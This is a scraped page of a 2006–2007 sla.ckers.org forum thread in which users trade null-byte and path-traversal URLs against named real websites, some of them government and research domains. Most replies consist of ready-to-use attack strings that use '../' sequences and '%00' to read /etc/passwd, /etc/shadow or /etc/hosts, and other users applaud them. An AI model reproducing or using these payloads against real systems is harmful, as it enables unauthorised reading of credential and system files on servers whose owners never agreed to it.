Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous12
Current Page: 2 of 2
Re: So it begins - Null byte edition
Posted by: WhiteAcid
Date: December 01, 2006 07:59PM

As the wikipedia page says, reading /etc/shadow is limited to root, and no one runs their web server as root.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: kirke
Date: February 02, 2007 07:34PM

just a starter ...
http://www.hypotirol.com/m002/hypotirol/Suche?basepath=42/../../../../../../../../../../../../etc/hosts%00&q=gotcha

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: tx
Date: February 02, 2007 08:10PM

I'll bite: http://www.nowhereradio.com/cgi-bin/show.cgi?templatefile=/etc/passwd%00htm
http://www.tactile.nrcan.gc.ca/page.cgi?url=page.cgi%00.htm
http://pristinetech.com/cgi-bin/display.cgi?file=../../../etc/passwd%00htm

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 02/03/2007 09:17PM by tx.

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: Luny
Date: February 09, 2007 04:33PM

http://library.thinkquest.org/28032/cgi-bin/psparse.cgi?src=../../../../../../etc/passwd%00

null byte mysql execution error?
http://software.sandia.gov/bugzilla/buglist.cgi?query_format=specific&order=relevance+desc&bug_status=__open__&product=PICO&content=%00

Ouch... nullbyte used to download .passwd file (originally you were suppost to download a pdf file)

http://xpdb.nist.gov/hiv2_d/download.cgi?ID=.passwd&file_location=../../../../../../etc/passwd%00

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com



Edited 2 time(s). Last edit at 02/09/2007 07:30PM by Luny.

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: jungsonn
Date: February 10, 2007 08:49AM

Awesome dude!

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: turbobricked
Date: February 11, 2007 12:51PM

WhiteAcid Wrote:
-------------------------------------------------------
> As the wikipedia page says, reading /etc/shadow is
> limited to root, and no one runs their web server
> as root.


Yes...especially not the site for everyone working in IT :-D

http://www.aboutit.co.nz/Iminit/servlet/Serve?file=../../../../../../../etc/shadow

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: tx
Date: February 12, 2007 03:27PM

Well they are just asking for trouble....

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: Luny
Date: February 17, 2007 04:11AM

http://www.krivet.re.kr/web-app/newkrivet-app/k/download.jsp?file_location=/upload/&file_name=../../../../../../etc/passwd%00

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

Options: ReplyQuote
Re: So it begins - Null byte edition
Posted by: dexedrine
Date: April 01, 2007 07:48PM

Some of those look like they have the same exact passwd file... honeypots perhaps?

Options: ReplyQuote
Pages: Previous12
Current Page: 2 of 2


Sorry, only registered users may post in this forum.